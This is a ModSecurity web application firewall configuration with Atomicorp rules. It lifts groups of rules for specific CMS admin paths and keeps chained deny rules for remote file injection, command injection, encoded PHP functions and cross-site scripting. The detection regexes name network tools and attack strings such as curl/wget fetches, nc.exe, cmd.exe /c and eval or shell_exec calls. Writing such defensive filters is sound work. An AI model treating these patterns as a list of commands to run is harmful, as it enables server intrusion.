SecRule REQUEST_FILENAME "/uplay/" "phase:2,id:91505,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/mapas_admin_edit\.php" "phase:2,id:91506,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:91507,t:none,pass,nolog,skipAfter:END_RULES_91507"

SecRule ARGS|!ARGS:/titulo/|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:passwordlogin "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340831,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/titulo/|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:passwordlogin "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340832,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecMarker END_RULES_91507

SecRule REQUEST_FILENAME "/projectpier/" "phase:2,id:91508,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/supportkb\.php" "phase:2,id:91509,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/systemadmin/supportkb\.php" "phase:2,id:91510,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/manage\.php" "phase:2,id:91511,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin_panel/" "phase:2,id:91512,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/inc/php/img\.php" "phase:2,id:91513,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/media/" "phase:2,id:91514,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340164"

SecRule REQUEST_FILENAME "/wizard_forms\.php" "phase:2,id:91515,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/content/types/import" "phase:2,id:91516,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371"

SecRule REQUEST_FILENAME "/wp-admin/post\.php" "phase:2,id:91517,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340014,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=390707,ctl:ruleRemovebyID=341146,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340213,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380006,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=340195"
SecAction "phase:2,id:91518,t:none,pass,nolog,skipAfter:END_RULES_91518"

SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/utm/|!REQUEST_COOKIES:/_pk_ref/|ARGS|!ARGS:content|!ARGS:fileContent|!ARGS:message|!ARGS:message_html|!ARGS:SAMLResponse|!ARGS:areas|!ARGS:/template/|!ARGS:site_first|!ARGS:sendDescription|!ARGS:templatecode|!ARGS:areas|!ARGS:wpSummary|!ARGS:/keyword/ "(?: ?(?:\bcurl\b|(?:w|ftp)get) (?:http|(?:s|t)?ftp|\- |dict|smb|file|gopher|imap|ldap|pop|rt|scp|smtp|telnet)| ?(?:cmd|command) ?= ?(?:chdir|mkdir|rm) |cd /(?:tmp|/var/tmp|/etc/|/proc|\.\.) |\|id ?\; ?echo.{1,200}\||\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|r?cmd|ftp)\.exe\b|c(?:md|ommand)(?:(?:32)?\.exe\b|\b /[ck])))"         "phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:cmdline,t:normalizePath,t:replaceNulls,chain,id:347714,rev:18,severity:2,msg:'Atomicorp.com WAF Rules: CMD injection',logdata:'%{TX.0}',tag:'Command Injection'"
SecRule REQUEST_URI "!(?:/count\.cgi|^/magento/index\.php/admin/dashboard/|^/images/stories/|^/content/pdf/media/print)" "t:none,t:lowercase"
SecRule ARGS|!ARGS:templatecode|!ARGS:areas|!ARGS:/news/|!ARGS:rsargs|!ARGS:/note/|!ARGS:announcement|!ARGS:/^meta/|!ARGS:SAMLResponse|!ARGS:/content/|!ARGS:/wysiwyg/|!ARGS:/prefix/|!ARGS:/suffix/|!ARGS:/comment/|!ARGS:problem|!ARGS:resolution|!ARGS:subject|!ARGS:/body/|!ARGS:/^widget-section/|!ARGS:/template/|!ARGS:/^eip_/|!ARGS:/sql/|!ARGS:prefix|!ARGS:/keyword/|!ARGS:/msg/|!ARGS:metadata|!ARGS:post_content|!ARGS:parent_name|!ARGS:topic|!ARGS:file_content|!ARGS:/^serendipity/|!ARGS:comment|!ARGS:summary|!ARGS:configoptionname|!ARGS:Definition|!ARGS:/php/|!ARGS:/Metatags/|!ARGS:/footerfile/|!ARGS:/layout/|!ARGS:/message/|!ARGS:email|!ARGS:/desc/|!ARGS:body|!ARGS:content "(?:\(chr ?\( ?[0-9]{1,3} ?\)| ?= ?f(?:open|write) ?\(|\b(?:passthru|serialize|php_uname|phpinfo|shell_exec|preg_\w+|mysql_query|exec|eval|create_function|system|base64_decode|decode_base64|base64_url_decode|str_rot13)\b ?(?:\(|\:))" 	"phase:2,deny,log,auditlog,status:403,t:none,t:replaceNulls,t:compressWhiteSpace,t:lowercase,capture,id:345195,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Base64 Encoded PHP function in Argument - this may be an attack.',logdata:'%{TX.0}'"

SecMarker END_RULES_91518

SecRule REQUEST_FILENAME "/wp-admin/" "phase:2,id:91519,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=390620,ctl:ruleRemovebyID=340852,ctl:ruleRemovebyID=340853,ctl:ruleRemovebyID=340854"


SecRule REQUEST_FILENAME "/tstemplate/ts/index\.php" "phase:2,id:91520,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340017"

SecRule REQUEST_FILENAME "/alta\.php" "phase:2,id:91521,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/setup/" "phase:2,id:91522,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/install/" "phase:2,id:91523,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/settings\.php" "phase:2,id:91524,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/projects/csb/ticket/" "phase:2,id:91525,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340144"

SecRule REQUEST_FILENAME "/contenido/main\.php" "phase:2,id:91526,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/orderform/processor\.php" "phase:2,id:91527,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/cgi-bin/soupermail\.pl" "phase:2,id:91528,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/read_dump\.php" "phase:2,id:91529,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin_center/" "phase:2,id:91530,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admincenter/" "phase:2,id:91531,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/homedeveloper\.php" "phase:2,id:91532,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/bevestiging\.php" "phase:2,id:91533,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/imagemanager/stream/index\.php" "phase:2,id:91534,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390614,ctl:ruleRemovebyID=390615,ctl:ruleRemovebyID=380006"

SecRule REQUEST_FILENAME "/export\.php" "phase:2,id:91535,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/privado/" "phase:2,id:91536,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/webform/configure" "phase:2,id:91537,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/portalcp/vbpoptions\.php" "phase:2,id:91538,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/thubservice\.php" "phase:2,id:91539,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/user\.php" "phase:2,id:91540,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91541,t:none,pass,nolog,skipAfter:END_RULES_91541"

SecRule ARGS|!ARGS:homepage|!ARGS:return|!ARGS:/user/|!ARGS:/pass/|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:www|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:passwordlogin "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340833,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:homepage|!ARGS:return|!ARGS:/user/|!ARGS:/pass/|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:www|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:passwordlogin "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340834,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecMarker END_RULES_91541

SecRule REQUEST_FILENAME "/survey/index\.php" "phase:2,id:91542,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
SecAction "phase:2,id:91543,t:none,pass,nolog,skipAfter:END_RULES_91543"

SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/move/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:welcome|!ARGS:changes|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:script|about|applet|activex|chrome).*(?:script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame|\%env)"  	"phase:2,deny,log,auditlog,status:403,t:none,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340835,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter'"
SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/move/|!ARGS:option[vbpclosedreason]|!ARGS:embeddump|!ARGS:changes|!ARGS:welcome|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:preview__hidden|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?((img|i?frame) ?src|a ?href) ?= ?(ogg|tls|ssl|gopher|zlib|(ht|f)tps?):/|alert ?\(|<? ((java|vb)?script|applet|activex|chrome) ?>|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?>|< ?/?i?frame|\%env)"  	"phase:2,deny,log,auditlog,status:403,multiMatch,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340836,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack'"
SecRule REQUEST_URI|ARGS|!ARGS:/move/|!ARGS:embeddump|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:changes|!ARGS:/contenido/|!ARGS:/tekst/|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:verbiage|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:usr1|!ARGS:resolution|!ARGS:problem|!ARGS:/^product_options/|!ARGS:eintrag|!ARGS:/edit/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:Returnid|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:order|!ARGS:youtube|!ARGS:business|!ARGS:/homePage/|!ARGS:/post/|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:meta_info|!ARGS:ta|!ARGS:/data/|!ARGS:search_theme_form_keys|ARGS_NAMES|!ARGS_NAMES:user[click_or_onmouseover]|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|